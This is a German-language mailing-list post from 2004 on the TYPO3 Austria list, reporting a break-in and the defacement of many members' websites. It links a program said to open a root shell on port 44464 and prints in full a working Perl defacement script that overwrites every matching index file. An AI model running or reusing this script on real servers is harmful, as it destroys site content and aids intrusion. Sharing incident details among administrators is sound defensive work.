AW: [Typo3-UG Oesterreich] OT: Angriffe gegen Tuga-Members

Christian Kurta kurta at typoheads.com
Mon Apr 26 17:36:15 CEST 2004 

So.
jetzt sind wir der sache ein bisschen näher gekommen.

So wars bei uns: (Bei einem anderen Tuga Mitglied war's über apache und nicht 
über den kernel!)

Also: Eingebrochen wurde bei uns über dieses Kernel-Backdoor (UND NICHT ÜBER 
APACHE!):
http://www.heise.de/newsticker/meldung/43341

Dann wurde dieses programm ausgeführt:
http://www.fdlsk8.hpg.ig.com.br/cgi.c

Dieses Proggy macht auf Port 44464 eine Rootshell auf.

Dann wurde dieses Perl-Script gestartet, damit alle dateien überschrieben 
wurden:
#!/usr/bin/perl
$ARGC=@ARGV;
print "[-] IndexOver v0.2 by shellc0de\n";
if ($ARGC!=3){
  print "  Uso: $0 <dir_dos_sites> <arquivo_procurado> 
<caminho_novo_arquivo>\n";
  die   "  Ex:  $0 /www index.html /tmp/index.htm\n";
}
print "[*] Buscando arquivos...\n";
$cmd="find $ARGV[0]|grep $ARGV[1] |";
open(FIND,"$cmd");
@list=<FIND>;
$quant=@list;
die "[!] Erro: Nenhum Arquivo Encontrado!\n", if ($quant==0);
print "[*] $quant arquivos encontrados\n";
print "[*] Mudando Indexes...\n";
foreach $local(@list){
   system("echo `cat $ARGV[2]` > $local");
}
print "[!] Total: $quant arquivos mudados.\n";








On Mon, 26 Apr 2004 16:10:05 +0200, Tilli Weissenberger wrote
> Übrigens, mein Beileid zu dieser vollkommen unnötigen Arbeit, alles wieder
> herzustellen... (mein ich ernst).
> 
> Lg, Tilli
> 
> typo3-at-bounces at lists.netfielders.de wrote:
> > Ich bin draufgekommen, das wir nicht die einzigen gewesen
> > sind, dessen Domains heute defaced wurden, deshalb möchte ich hier
> > mal was loswerden: 
> > 
> > Bei uns waren heute alle Index.HTML, Index.HTM, Index.PHP,
> > GIF und JPG files durch einen anderen Quellcode ersetzt.
> > 
> > Hier einige Domains von Tuga-Mitgliedern die defaced wurden:
> > http://www.zone-h.org/en/defacements/filter/filter_domain=at/page=1/
> > 
> > Da sind unsere 150 defaceten noch gar nicht dabei. Die
> > betroffenen Personen wissen's eh.
> > 
> > Also: Apache updaten und viel glück!
> > (Betroffen: Apache bis 1.3.29)
> > 
> > Mehr hamma noch nicht rausgefunden, da der Sack die Logfiles gelöscht
> > hat. 
> > 
> > mfg
> 
> _______________________________________________
> Typo3-at mailing list
> Typo3-at at lists.netfielders.de
> http://lists.netfielders.de/cgi-bin/mailman/listinfo/typo3-at



mfg

--
Christian Kurta
kurta at typoheads.com
www.typoheads.com
Tel.: 0650 / 530 12 76
ICQ: 50273991
----------------------
Neue Projekte:
http://www.angelinis.at - Angelinis Bar & Restaurant
http://www.strassberger.at - Uhren, Schmuck Straßberger Horn
http://www.acon-consulting.com - ACON Management Consulting

More information about the TYPO3-at mailing list